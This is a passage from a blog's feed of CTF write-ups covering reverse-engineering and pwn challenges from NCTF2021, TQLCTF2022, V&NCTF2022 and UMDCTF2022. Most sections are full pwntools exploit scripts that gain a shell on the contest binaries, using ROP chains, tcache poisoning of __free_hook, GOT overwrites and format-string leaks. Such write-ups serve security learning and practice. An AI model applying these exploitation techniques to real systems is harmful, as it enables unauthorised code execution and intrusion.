class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span></span><br><span class="line"> };</span><br><span class="line"> Console.WriteLine(<span class="string">"Welcome to nepnep csharp test! plz input the magical code:"</span>);</span><br><span class="line"> <span class="built_in">string</span> str = Console.ReadLine();</span><br><span class="line"> <span class="keyword">if</span> (str.Length != <span class="number">0x25</span>)</span><br><span class="line"> {</span><br><span class="line"> Console.WriteLine(<span class="string">"Nope!"</span>);</span><br><span class="line"> Console.ReadKey();</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> ((str.Substring(<span class="number">0</span>, <span class="number">4</span>) != <span class="string">"Nep{"</span>) || (str[<span class="number">0x24</span>] != <span class="string">'}'</span>))</span><br><span class="line"> {</span><br><span class="line"> Console.WriteLine(<span class="string">"Nope!"</span>);</span><br><span class="line"> Console.ReadKey();</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">for</span> (<span class="built_in">int</span> i = <span class="number">0</span>; i < <span class="number">0x20</span>; i++)</span><br><span class="line"> {</span><br><span class="line"> key = key + Convert.ToChar((<span class="built_in">int</span>) (buffer[i] ^ <span class="number">0x33</span>)).ToString();</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">if</span> (<span class="built_in">string</span>.Compare(class2.AesEncrypt(str, key), strB) == <span class="number">0</span>)</span><br><span class="line"> 
{</span><br><span class="line"> Console.WriteLine(<span class="string">"wow, you pass it!"</span>);</span><br><span class="line"> Console.ReadKey();</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> Console.WriteLine(<span class="string">"Nope!"</span>);</span><br><span class="line"> Console.ReadKey();</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure>
<p>The decompiled C# code above shows the check: the key is the 32-byte buffer XORed with 0x33, and the input (37 characters, <code>Nep{...}</code>) must AES-encrypt under that key to the given Base64 string.</p>
<p>exp:</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">a = [<span class="number">0x51</span>, <span class="number">0x52</span>, <span class="number">0x57</span>, <span class="number">0x51</span>, <span class="number">0x52</span>, <span class="number">0x57</span>, <span class="number">0x44</span>, <span class="number">0x5c</span>, <span class="number">0x5e</span>, <span class="number">0x56</span>, <span class="number">0x5d</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>,</span><br><span class="line"> <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>, <span class="number">0x12</span>]</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(a)):</span><br><span class="line"> <span class="built_in">print</span>(<span class="built_in">chr</span>(a[i] ^ <span class="number">0x33</span>),end=<span class="string">""</span>)</span><br></pre></td></tr></table></figure>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">python3 test.py</span><br><span class="line">badbadwomen!!!!!!!!!!!!!!!!!!!!!</span><br></pre></td></tr></table></figure>
<p>Then decrypt the Base64 ciphertext with that key on an online AES tool (the mode and IV have to match whatever AesClass uses; they are not visible in the snippet above):</p>
<p><img src="https://raw.githubusercontent.com/YTrick/image/branch/image/20210322133852.png" alt="20210322133852"></p>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>NCTF2021</title>
<url>/article/NCTF2021/</url>
<content><![CDATA[<h1 id="NCTF2021"><a href="#NCTF2021" class="headerlink" title="NCTF2021"></a>NCTF2021</h1><!-- article page config -->
<h1 id="login"><a href="#login" class="headerlink" title="login"></a>login</h1><h2 id="函数中的syscall调用"><a href="#函数中的syscall调用" class="headerlink" title="函数中的syscall调用"></a>A syscall inside a function</h2><p>The <code>close</code> function contains a call to syscall.</p>
<p><img src="/article/NCTF2021/image-20211129205721889.png" alt="image-20211129205721889"></p>
<p>The challenge closes <code>stdout</code> and <code>stderr</code>; after getting a shell, use <code>cat flag>&0</code>.</p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">'login1'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'81.69.185.153'</span>,<span class="number">8011</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line"><span 
class="function"><span class="keyword">def</span> <span class="title">csu</span>(<span class="params">function,rdi,rsi,rdx</span>):</span></span><br><span class="line"> payload = p64(<span class="number">0</span>) + p64(<span class="number">1</span>) + p64(rdi) + p64(rsi) + p64(rdx) + p64(function)</span><br><span class="line"> payload += p64(<span class="number">0x000000000401270</span>)</span><br><span class="line"> <span class="keyword">return</span> payload</span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">main = <span class="number">0x40119a</span></span><br><span class="line">main_read = <span class="number">0x0000000004011ED</span></span><br><span class="line">fake_stack = <span class="number">0x404090</span></span><br><span class="line">read_got = <span class="number">0x404030</span></span><br><span class="line">close_got = <span class="number">0x404028</span></span><br><span class="line">leave = <span class="number">0x40121f</span></span><br><span class="line"></span><br><span class="line">gdb.attach(p,<span class="string">'b 0x0000000004011E8'</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x100</span> + p64(fake_stack+<span class="number">0x100</span>) + p64(main_read) </span><br><span class="line">p.sendafter(<span class="string">'Welcome to NCTF2021!'</span>,payload)</span><br><span class="line"></span><br><span class="line">payload = p64(<span class="number">0x00000000040128A</span>)</span><br><span class="line">payload += csu(read_got,<span class="number">0</span>,close_got,<span class="number">1</span>) + p64(<span class="number">0</span>)</span><br><span class="line">payload += csu(read_got,<span class="number">0</span>,fake_stack,<span class="number">0x3b</span>) + p64(<span class="number">0</span>)</span><br><span class="line">payload 
+= csu(close_got,fake_stack,<span class="number">0</span>,<span class="number">0</span>)</span><br><span class="line">payload = payload.ljust(<span class="number">0x100</span>,<span class="string">'\x00'</span>) + p64(fake_stack-<span class="number">8</span>) + p64(leave)</span><br><span class="line">p.send(payload)</span><br><span class="line"></span><br><span class="line">p.send(<span class="string">'\xf5'</span>)</span><br><span class="line"></span><br><span class="line">p.send(<span class="string">'/bin/sh\x00'</span>.ljust(<span class="number">0x3B</span>,<span class="string">'\x00'</span>))</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="ezheap"><a href="#ezheap" class="headerlink" title="ezheap"></a>ezheap</h1><h2 id="libc-2-33"><a href="#libc-2-33" class="headerlink" title="libc-2.33"></a>libc-2.33</h2><p>Allocate 9 chunks plus one chunk to prevent consolidation. After freeing them all, chunks 8 and 9 end up in the unsorted bin.</p>
<p>Allocate one more chunk to free up a tcache slot, then free chunk 9 once more to get chunk reuse.</p>
<h2 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">'ezheap'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = 
ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'>> '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,content</span>):</span></span><br><span class="line"> cmd(<span class="number">1</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Size: '</span>,<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendlineafter(<span class="string">'Content: '</span>,content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">edit</span>(<span class="params">index,content</span>):</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Index: '</span>,<span class="built_in">str</span>(index)) </span><br><span class="line"> p.sendlineafter(<span class="string">'Content: '</span>,content) </span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">3</span>)</span><br><span class="line"> p.sendlineafter(<span class="string">'Index: '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">4</span>)</span><br><span 
class="line"> p.sendlineafter(<span class="string">'Index: '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>): <span class="comment">#0-9</span></span><br><span class="line"> add(<span class="number">0x80</span>,<span class="string">'a'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">9</span>): <span class="comment">#7 tcache ,2 unsorted bin ,1 use chunk</span></span><br><span class="line"> free(i)</span><br><span class="line"></span><br><span class="line">show(<span class="number">1</span>)</span><br><span class="line">tmp = u64(p.recv(<span class="number">8</span>))</span><br><span class="line">ptr0_11=tmp>><span class="number">36</span></span><br><span class="line">ptr0_23=((ptr0_11<<<span class="number">24</span>)^tmp)>><span class="number">24</span></span><br><span class="line">ptr0_35=((ptr0_23<<<span class="number">12</span>)^tmp)>><span class="number">12</span></span><br><span class="line">heap_base=ptr0_35<<<span class="number">12</span></span><br><span class="line">log.success(<span class="string">'heap_base: '</span> + <span class="built_in">hex</span>(heap_base))</span><br><span class="line">show(<span class="number">7</span>)</span><br><span class="line">malloc_hook = u64(p.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>)) - <span class="number">0x10</span> - <span class="number">96</span> </span><br><span class="line">libc_base = malloc_hook - libc.sym[<span class="string">'__malloc_hook'</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span 
class="string">'system'</span>]</span><br><span class="line">free_hook = libc_base + libc.sym[<span class="string">'__free_hook'</span>]</span><br><span class="line">log.success(<span class="string">'libc_base: '</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">add(<span class="number">0x80</span>,<span class="string">'a'</span>) <span class="comment">#10 # t=6 tcache malloc one chunk 7 -> 6</span></span><br><span class="line">free(<span class="number">8</span>)</span><br><span class="line">add(<span class="number">0x70</span>,<span class="string">'bbbb'</span>) <span class="comment">#11</span></span><br><span class="line"></span><br><span class="line">ptr_addr = heap_base+<span class="number">0x720</span></span><br><span class="line">payload = p64(<span class="number">0</span>) + p64(<span class="number">0x19</span>)</span><br><span class="line">payload += p64(free_hook^(ptr_addr>><span class="number">12</span>))</span><br><span class="line">add(<span class="number">0x70</span>,payload) <span class="comment">#12</span></span><br><span class="line">add(<span class="number">0x80</span>,<span class="string">'/bin/sh\x00'</span>) <span class="comment">#13</span></span><br><span class="line">add(<span class="number">0x80</span>,p64(system_addr)) <span class="comment">#14</span></span><br><span class="line"></span><br><span class="line">free(<span class="number">13</span>)</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
<tags>
<tag>syscall</tag>
</tags>
</entry>
<entry>
<title>TQLCTF2022</title>
<url>/article/TQLCTF2022/</url>
<content><![CDATA[<h1 id="TQLCTF2022"><a href="#TQLCTF2022" class="headerlink" title="TQLCTF2022"></a>TQLCTF2022</h1><!-- article page config -->
<h1 id="unbelievable-write"><a href="#unbelievable-write" class="headerlink" title="unbelievable_write"></a>unbelievable_write</h1><h2 id="libc-2-31"><a href="#libc-2-31" class="headerlink" title="libc-2.31"></a>libc-2.31</h2><p>No leak, no PIE.</p>
<p>The c1 function mallocs a chunk, reads a line into it, and frees it immediately.</p>
<p>The c2 function can free an arbitrary address on the heap; the hard part is the size check.</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">filename = <span class="string">'pwn2022'</span></span><br><span class="line">p = process(filename)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">cmd</span>(<span class="params">index</span>):</span></span><br><span class="line"> p.sendlineafter(<span class="string">'> '</span>,<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,content</span>):</span></span><br><span class="line"> cmd(<span class="number">1</span>)</span><br><span class="line"> p.sendline(<span class="built_in">str</span>(size))</span><br><span class="line"> p.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">free</span>(<span class="params">index</span>):</span></span><br><span class="line"> cmd(<span class="number">2</span>)</span><br><span class="line"> p.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line">target = <span class="number">0x404080</span></span><br><span class="line">prt = <span class="number">0x4040D0</span></span><br><span class="line">free_got = <span class="number">0x404018</span></span><br><span class="line"></span><br><span class="line">free(-<span class="number">0x290</span>)</span><br><span class="line"></span><br><span class="line">payload = p64(<span class="number">0x404018</span>)*<span class="number">0x40</span> + p64(<span class="number">0x404080</span>)*<span class="number">0x40</span></span><br><span class="line">add(<span 
class="number">0x280</span>,payload)</span><br><span class="line">payload = p64(<span class="number">0x4013be</span>) + p64(<span class="number">0x401040</span>) + p64(<span class="number">0x401050</span>)</span><br><span class="line">add(<span class="number">0xa0</span>,payload)</span><br><span class="line">add(<span class="number">0x320</span>,<span class="string">'1111'</span>)</span><br><span class="line"></span><br><span class="line">gdb.attach(p)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>UTCTF2022</title>
<url>/article/UTCTF2022/</url>
<content><![CDATA[<h1 id="UTCTF2022"><a href="#UTCTF2022" class="headerlink" title="UTCTF2022"></a>UTCTF2022</h1><blockquote>
<p>Belated recollection: several CTFs were running at the same time, so I only took a quick look at this one and had no time to work on the challenges during the competition.</p>
</blockquote>
<h1 id="Smol-Overflow"><a href="#Smol-Overflow" class="headerlink" title="Smol Overflow"></a>Smol Overflow</h1><blockquote>
<p>You can have a little overflow, as a treat</p>
<p>By Tristan (@trab on discord)</p>
<p><code>nc pwn.utctf.live 5004</code></p>
</blockquote>
<h1 id="Automated-Exploit-Generation-2"><a href="#Automated-Exploit-Generation-2" class="headerlink" title="Automated Exploit Generation 2"></a>Automated Exploit Generation 2</h1><blockquote>
<p>Now with printf!</p>
<p>By Tristan (@trab on discord)</p>
<p>nc pwn.utctf.live 5002</p>
</blockquote>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>V&NCTF2022</title>
<url>/article/V&NCTF2022/</url>
<content><![CDATA[<h1 id="V-amp-NCTF2022"><a href="#V-amp-NCTF2022" class="headerlink" title="V&NCTF2022"></a>V&NCTF2022</h1><h1 id="clear-got"><a href="#clear-got" class="headerlink" title="clear_got"></a>clear_got</h1><p><img src="/article/V&NCTF2022/image-20220225153956554.png" alt="image-20220225153956554"></p>
<p><img src="/article/V&NCTF2022/image-20220225153934386.png" alt="image-20220225153934386"></p>
<p><img src="/article/V&NCTF2022/image-20220225153923845.png" alt="image-20220225153923845"></p>
<h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>Exploitation approach</h2><p>Stack overflow. Use the end2 function to leak libc, return to the <code>mov eax, 0</code> in main, invoke the read syscall to write the address of system into <code>puts@got</code>, and finally <code>call puts</code> to get a shell.</p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> time, sys, base64</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># 1 pro</span></span><br><span class="line"><span class="comment"># 2 remote</span></span><br><span class="line"><span class="comment"># 3 127</span></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">'clear_got'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span 
class="line"></span><br><span class="line">main_addr = elf.sym[<span class="string">'main'</span>]</span><br><span class="line">puts_got = elf.got[<span class="string">'puts'</span>]</span><br><span class="line">puts_plt = elf.plt[<span class="string">'puts'</span>]</span><br><span class="line">libc_main_got = elf.got[<span class="string">'__libc_start_main'</span>]</span><br><span class="line">syscall = <span class="number">0x00000000040077E</span></span><br><span class="line">syswrite = <span class="number">0x0000000000400774</span></span><br><span class="line">pop_rdi = <span class="number">0x00000000004007f3</span></span><br><span class="line">pop_rsi_r15 = <span class="number">0x00000000004007f1</span></span><br><span class="line">bss = <span class="number">0x60107C</span></span><br><span class="line">mov_eax = <span class="number">0x00000000040075C</span></span><br><span class="line">call_puts = <span class="number">0x00000000040071E</span></span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'competition.///'</span>)</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'a'</span>*<span class="number">0x68</span> + p64(pop_rdi) + p64(<span class="number">1</span>) + p64(pop_rsi_r15) + p64(libc_main_got) + p64(<span class="number">0</span>) + p64(syswrite) </span><br><span class="line">payload += p64(mov_eax) + p64(pop_rdi) + p64(<span class="number">0</span>) + p64(pop_rsi_r15) + p64(puts_got)*<span class="number">2</span> + p64(syscall) </span><br><span class="line">payload += p64(pop_rdi) + p64(puts_got+<span class="number">8</span>) + p64(call_puts)</span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line">libc_main = u64(p.recvuntil(<span class="string">'\x7f'</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">'\x00'</span>))</span><br><span class="line">libc_base = libc_main - 
libc.sym[<span class="string">'__libc_start_main'</span>]</span><br><span class="line">system_addr = libc_base + libc.sym[<span class="string">'system'</span>]</span><br><span class="line">log.success(<span class="string">'libc_main: '</span> + <span class="built_in">hex</span>(libc_main))</span><br><span class="line">log.success(<span class="string">'libc_base: '</span> + <span class="built_in">hex</span>(libc_base))</span><br><span class="line"></span><br><span class="line">payload = p64(system_addr) + <span class="string">'/bin/sh\x00'</span></span><br><span class="line">p.sendline(payload)</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(p)</span></span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
]]></content>
<categories>
<category>WriteUp</category>
</categories>
</entry>
<entry>
<title>UMDCTF2022</title>
<url>/article/UMDCTF2022/</url>
<content><![CDATA[<h1 id="umdctf2022"><a href="#umdctf2022" class="headerlink" title="umdctf2022"></a>umdctf2022</h1><p><a href="https://umdctf.io/">umdctf</a></p>
<h1 id="Legacy"><a href="#Legacy" class="headerlink" title="Legacy"></a>Legacy</h1><blockquote>
<p>nc 0.cloud.chals.io 28964</p>
<p>tag: python2</p>
</blockquote>
<h2 id="概要"><a href="#概要" class="headerlink" title="概要"></a>Summary</h2><p>The Python 2 <code>input</code> function vulnerability.</p>
<h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>Analysis</h2><p>Entering a string causes an error right away; the traceback reveals the key line <code>if (input(str(3-i) + " chances left! \n") == secret):</code>. Simply entering <code>secret</code> bypasses the check.</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># nc 0.cloud.chals.io 28964</span></span><br><span class="line">I bet you can<span class="string">'t guess my *secret* number!</span></span><br><span class="line"><span class="string">I'</span>ll give you hint, its between 0 and 0,1000000000000000514!</span><br><span class="line">aaaa</span><br><span class="line">3 chances left! </span><br><span class="line">Traceback (most recent call last):</span><br><span class="line"> File <span class="string">"/home/ctf/legacy.py"</span>, line 15, <span class="keyword">in</span> <module></span><br><span class="line"> <span class="keyword">if</span> (input(str(3-i) + <span class="string">" chances left! \n"</span>) == secret):</span><br><span class="line"> File <span class="string">"<string>"</span>, line 1, <span class="keyword">in</span> <module></span><br><span class="line">NameError: name <span class="string">'aaaa'</span> is not defined</span><br></pre></td></tr></table></figure>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># nc 0.cloud.chals.io 28964</span></span><br><span class="line">I bet you can<span class="string">'t guess my *secret* number!</span></span><br><span class="line"><span class="string">I'</span>ll give you hint, its between 0 and 0,1000000000000000514!</span><br><span class="line">secret</span><br><span class="line">3 chances left! </span><br><span class="line">No way!</span><br><span class="line">UMDCTF{W3_H8_p7th0n2}</span><br></pre></td></tr></table></figure>
<h1 id="Classic-Act"><a href="#Classic-Act" class="headerlink" title="Classic Act"></a>Classic Act</h1><blockquote>
<p>tag: ROP fmt</p>
</blockquote>
<h2 id="checksec"><a href="#checksec" class="headerlink" title="checksec"></a>checksec</h2><figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">Arch: amd64-64-little</span><br><span class="line">RELRO: Partial RELRO</span><br><span class="line">Stack: Canary found</span><br><span class="line">NX: NX enabled</span><br><span class="line">PIE: No PIE (0x400000)</span><br></pre></td></tr></table></figure>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.os = <span class="string">'linux'</span></span><br><span class="line">context.arch = <span class="string">'amd64'</span></span><br><span class="line"><span class="comment"># context.arch = 'i386'</span></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">debug = <span class="number">1</span></span><br><span class="line">filename = <span class="string">'classicact'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">1</span> :</span><br><span class="line"> p = process(filename)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">2</span>:</span><br><span class="line"> p = remote(<span class="string">'node4.buuoj.cn'</span>,<span class="number">20002</span>)</span><br><span class="line"><span class="keyword">if</span> debug == <span class="number">3</span>:</span><br><span class="line"> p = remote(<span class="string">'127.0.0.1'</span>,<span class="number">12345</span>)</span><br><span class="line"> <span class="comment">#23946</span></span><br><span class="line"></span><br><span class="line">elf = ELF(filename)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">pop_rdi = <span class="number">0x00000000004013a3</span></span><br><span class="line">ret = <span class="number">0x000000000040101a</span></span><br><span class="line">payload = <span class="string">'%19$paaaa%25$p'</span></span><br><span class="line">p.sendlineafter(<span class="string">'Please enter your name!'</span>,payload)</span><br><span class="line">p.recvuntil(<span class="string">'Hello:\n'</span>)</span><br><span class="line">canary = <span class="built_in">int</span>(p.recv(<span class="number">18</span>),<span class="number">16</span>)</span><br><span class="line">p.recvuntil(<span class="string">'aaaa'</span>)</span><br><span class="line">libc_main = <span class="built_in">int</span>(p.recv(<span class="number">14</span>),<span class="number">16</span>) - <span class="number">240</span></span><br><span class="line"></span><br><span class="line">libc_base = libc_main - libc.sym[<span class="string">'__libc_start_main'</span>]</span><br><span class="line">sys = libc_base + libc.sym[<span class="string">'system'</span>]</span><br><span class="line">bin_sh = libc_base + libc.search(<span class="string">'/bin/sh'</span>).<span class="built_in">next</span>()</span><br><span class="line">log.success(<span class="string">'canary: '</span> + <span class="built_in">hex</span>(canary))</span><br><span class="line"></span><br><span class="line">payload = <span class="string">'Play in UMDCTF!'</span></span><br><span class="line">payload = payload.ljust(<span class="number">0x48</span>)</span><br><span class="line">payload += p64(canary)*<span class="number">2</span> + p64(pop_rdi) + p64(bin_sh) + p64(sys)</span><br><span class="line">p.sendlineafter(<span class="string">'today?'</span>,payload)</span><br><span class="line"></span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>
<h1 id="The-Show-Must-Go-On"><a href="#The-Show-Must-Go-On" class="headerlink" title="The Show Must Go On"></a>The Show Must Go On</h1><blockquote>
<p>We are in the business of entertainment, the show must go on! Hope we can find someone to replace our old act super fast…</p>
<p><strong>Author</strong>: WittsEnd2</p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">0.cloud.chals.io 30138</span><br></pre></td></tr></table></figure>
<p>tag: heap-overflow</p>
</blockquote>
<h2 id="利用思路"><a href="#利用思路" class="headerlink" title="利用思路"></a>Exploitation approach</h2><p>At first I found an overflow when entering <code>showDescription</code> into the program. The program also provides a <code>win</code> function (I did not notice it at first, because there are so many functions). We only need to overwrite <code>mainAct + 0x60</code> with the address of <code>win</code>, replacing the <code>tellAJoke</code> function, to get the flag. For that, the chunk allocated by <code>showDescription = malloc_set(v22 + 8);</code> has to sit above <code>mainAct</code> on the heap. Since <code>message1</code> and <code>message3</code> were <code>free</code>d before our allocation, requesting a <code>size</code> equal to those two chunks is enough to meet this requirement.</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line">*(_QWORD *)(mainAct + <span class="number">0x60</span>) = tellAJoke;</span><br><span class="line">currentAct = mainAct;</span><br><span class="line"><span class="built_in">free</span>(message1);</span><br><span class="line"><span class="built_in">free</span>(message3);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">"How long do you want the show description to be?"</span>);</span><br><span class="line">_isoc99_scanf((<span class="keyword">unsigned</span> <span class="keyword">int</span>)<span class="string">"%d"</span>, (<span class="keyword">unsigned</span> <span class="keyword">int</span>)&v22, v17, v18, v19, v20);</span><br><span class="line">showDescription = malloc_set(v22 + <span class="number">8</span>);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">"Describe the show for us:"</span>);</span><br><span class="line">getchar();</span><br><span class="line">fgets(showDescription, <span class="number">500LL</span>, <span class="built_in">stdin</span>);</span><br><span class="line">actList = mainAct;</span><br></pre></td></tr></table></figure>
